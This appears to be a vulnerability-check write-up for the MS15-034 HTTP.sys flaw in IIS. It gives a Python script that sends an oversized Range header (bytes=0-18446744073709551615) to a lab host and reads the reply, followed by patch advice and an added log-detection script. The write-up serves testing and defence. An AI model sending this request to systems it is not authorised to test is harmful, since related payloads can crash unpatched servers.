I. Test environment
IP: 192.168.80.200
Operating system: win2012
Middleware: IIS 8.5
II. Vulnerability background
For details of the vulnerability, see:
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
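III. Verification
import requests

# Target under test (the lab host from section I)
url = "http://192.168.80.200"
http_headers = {
    "Host": "irrelevant",
    # Upper bound of the range is 2**64 - 1
    "Range": "bytes=0-18446744073709551615",
}
response = requests.get(url=url, headers=http_headers, timeout=10)
# This check treats a "Requested Range Not Satisfiable" reply as the vulnerable case
if "Requested Range Not Satisfiable" in response.text:
    print("url: " + url + " 存在MS15-034漏洞!")  # MS15-034 vulnerability present
else:
    print("url: " + url + " 未发现漏洞")  # no vulnerability found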
IV. Mitigations
1. Apply the patch
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
2. Temporarily disable IIS kernel caching
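
To complement the mitigations above, here is an added detection example (not part of the original page) that flags Range header values like the one sent in section III when they show up in proxy or WAF logs. The function names, the 2**63 threshold and the sample header values are assumptions constructed for illustration.

```python
import re

UINT64_MAX = 2 ** 64 - 1  # 18446744073709551615, the value sent in section III
# Assumption: offsets at or above 2**63 are also flagged; no real file is that large.
SUSPICIOUS_OFFSET = 2 ** 63
# Digit runs are bounded so int() never receives an absurdly long string from a log.
_RANGE_SPEC = re.compile(r"^\s*(\d{0,40})\s*-\s*(\d{0,40})\s*$")


def parse_byte_ranges(header_value):
    """Return [(first, last), ...] with None for an omitted bound, or None if malformed."""
    unit, sep, specs = header_value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return None
    ranges = []
    for spec in specs.split(","):
        m = _RANGE_SPEC.match(spec)
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2)) if m.group(2) else None
        ranges.append((first, last))
    return ranges


def classify_range_header(header_value):
    """Return 'ms15-034-probe', 'oversized', 'malformed' or 'ok'."""
    ranges = parse_byte_ranges(header_value)
    if ranges is None:
        return "malformed"
    offsets = [v for pair in ranges for v in pair if v is not None]
    if UINT64_MAX in offsets:
        return "ms15-034-probe"
    if any(v >= SUSPICIOUS_OFFSET for v in offsets):
        return "oversized"
    return "ok"


# Constructed sample Range header values, as they might appear in request logs.
SAMPLE_HEADERS = [
    "bytes=0-499", "bytes=500-", "bytes=-200",
    "bytes=0-18446744073709551615", "bytes=18-9223372036854775808", "items=0-5",
]

if __name__ == "__main__":
    for value in SAMPLE_HEADERS:
        print(f"{classify_range_header(value):15} {value}")
```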